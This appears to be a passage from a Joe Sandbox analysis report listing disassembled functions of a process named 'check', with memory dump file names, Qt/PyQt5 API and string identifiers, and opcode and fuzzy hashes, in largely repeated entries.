                                                                                                                                                                                                                                          Function 00007FF89D945D30 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?beginAbstractItemModel@Model@@ResetRestoreSave
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$beginResetModel$beginResetModel(self)
                                                                                                                                                                                                                                          • API String ID: 4136900167-2451044599
                                                                                                                                                                                                                                          • Opcode ID: eebcf2e300671057d8ff72aee1aa14122a0d02e87a475b7e2b065e613e7e97c6
                                                                                                                                                                                                                                          • Instruction ID: 5fdbb185932001b0c6945e1b38c49ff4920ec619e6078d0d7e713789db30b588
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eebcf2e300671057d8ff72aee1aa14122a0d02e87a475b7e2b065e613e7e97c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC11DA36A08B4AD1DB109F51E8496A933A4FB48FD4F954032DA9E07320EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D9460C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?endAbstractItemModel@Model@@ResetRestoreSave
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$endResetModel$endResetModel(self)
                                                                                                                                                                                                                                          • API String ID: 167963407-115090492
                                                                                                                                                                                                                                          • Opcode ID: 1b4bff4ed0664750f26292fd1c8b4ef745dca8d27799a93798ed7232d9c809b5
                                                                                                                                                                                                                                          • Instruction ID: f6c3f9d3e386fbac20004ce3480149ff78bd0486845cd4772acfddfabc659918
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4bff4ed0664750f26292fd1c8b4ef745dca8d27799a93798ed7232d9c809b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F11C876A08B46D1EB109F11E8496A933A4FB88FD4F954032DA9E03320EF7CE559C344
                                                                                                                                                                                                                                          Function 00007FF89D978090 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
                                                                                                                                                                                                                                          • String ID: BJ9$QSyntaxHighlighter$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
                                                                                                                                                                                                                                          • API String ID: 544305041-3622301315
                                                                                                                                                                                                                                          • Opcode ID: 0b186527a7c32fde057e19afc3debdda5f8a29f0c83d469de7bee5b7e90abdcf
                                                                                                                                                                                                                                          • Instruction ID: c5ec8ab6240195888374d78051f4c347f68e2830247cd3cf3ac9f5a14aacb330
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b186527a7c32fde057e19afc3debdda5f8a29f0c83d469de7bee5b7e90abdcf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4110636A18F46C1EB109F21E8896A933E4FB44B94F914032CA9E47320EF3DE559C348
                                                                                                                                                                                                                                          Function 00007FF89D9C2010 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Connected@FromLongMetaMethod@@@Object@@Signal
                                                                                                                                                                                                                                          • String ID: BJ9$QDoubleValidator$isSignalConnected$isSignalConnected(self, signal: QMetaMethod) -> bool
                                                                                                                                                                                                                                          • API String ID: 544305041-3212557205
                                                                                                                                                                                                                                          • Opcode ID: e7b7f2a00b13e59cd2dc0b513c5587b7c1e6d2be77ff2416051fa28ffc45f459
                                                                                                                                                                                                                                          • Instruction ID: ed0053092eef5fcfe5a4b9583023cecf5b93b49ed820eb4518ada53a0b60d809
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7b7f2a00b13e59cd2dc0b513c5587b7c1e6d2be77ff2416051fa28ffc45f459
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2111836A08F46C1EB10DF25E8896A933E4FB44B94F914032CA9E07320EF3DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D94DE80 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?quadBool_FromLongPolygonSquare@Transform@@V1@@
                                                                                                                                                                                                                                          • String ID: J9J9$QTransform$quadToSquare$quadToSquare(quad: QPolygonF, result: QTransform) -> bool
                                                                                                                                                                                                                                          • API String ID: 180076461-2972677403
                                                                                                                                                                                                                                          • Opcode ID: c93268c15d8a67622563f5231641df0aba3efc97a0cf4405c5368f56375e02c2
                                                                                                                                                                                                                                          • Instruction ID: 6d7248f984c5b596b50de675d9ef45f6047506a4fb301f94176698e660676d01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93268c15d8a67622563f5231641df0aba3efc97a0cf4405c5368f56375e02c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8012536A08E46D1EB109F21E8896A933F5FB44FD5F914032DA9E07320EE3CE569C744
                                                                                                                                                                                                                                          Function 00007FF89D9BDDC0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                          • String ID: J9J9$J9f$fJ9
                                                                                                                                                                                                                                          • API String ID: 2803490479-1735737320
                                                                                                                                                                                                                                          • Opcode ID: de3e3daff530d36339894ed25ca98a053840b6e5a91a6427aa78bc3cfec6ebf5
                                                                                                                                                                                                                                          • Instruction ID: 87d3f7dec105e6f147cd9c07584a7a37d4834e442ad094e97f44756d70f6e0e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de3e3daff530d36339894ed25ca98a053840b6e5a91a6427aa78bc3cfec6ebf5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12613037609B4585EB608F26E8442A977A5FB88FD8F455136EE8E43B68EF3CE150C704
                                                                                                                                                                                                                                          Function 00007FF89D939D50 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawEngine@@Lines@Paint$LineLine@@
                                                                                                                                                                                                                                          • String ID: QPaintEngine$drawLines$drawLines(self, lines: Optional[PyQt5.sip.array[QLine]])drawLines(self, lines: Optional[PyQt5.sip.array[QLineF]])
                                                                                                                                                                                                                                          • API String ID: 1512926883-3197972377
                                                                                                                                                                                                                                          • Opcode ID: 727c9b396a0523dd205d7431e2e43b246fad74a3ec8e951e0c44ea087e62fb1d
                                                                                                                                                                                                                                          • Instruction ID: d5202546bf3c4f0ea078323a3ab25f31469ceb58ec793c652a0532a946e4f8c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 727c9b396a0523dd205d7431e2e43b246fad74a3ec8e951e0c44ea087e62fb1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB411D33A09B46D9EB608F25E8442A973B4FB44BD8F544132EA8E07B64EF3CE554C744
                                                                                                                                                                                                                                          Function 00007FF7124F2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                          • Instruction ID: b1cbeaba42348124522203c7b92dd1bdc309ccd5032514b0233f9594a50995f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD318832A19E8185E724EF21E8951F9A360FF887A4F840135EE4D47B59DFBCD109C714
                                                                                                                                                                                                                                          Function 00007FF89D957A30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?sibling@QStandardItemModel@@UEBA?AVQModelIndex@@HHAEBV2@@Z.QT5GUI ref: 00007FF89D957B11
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
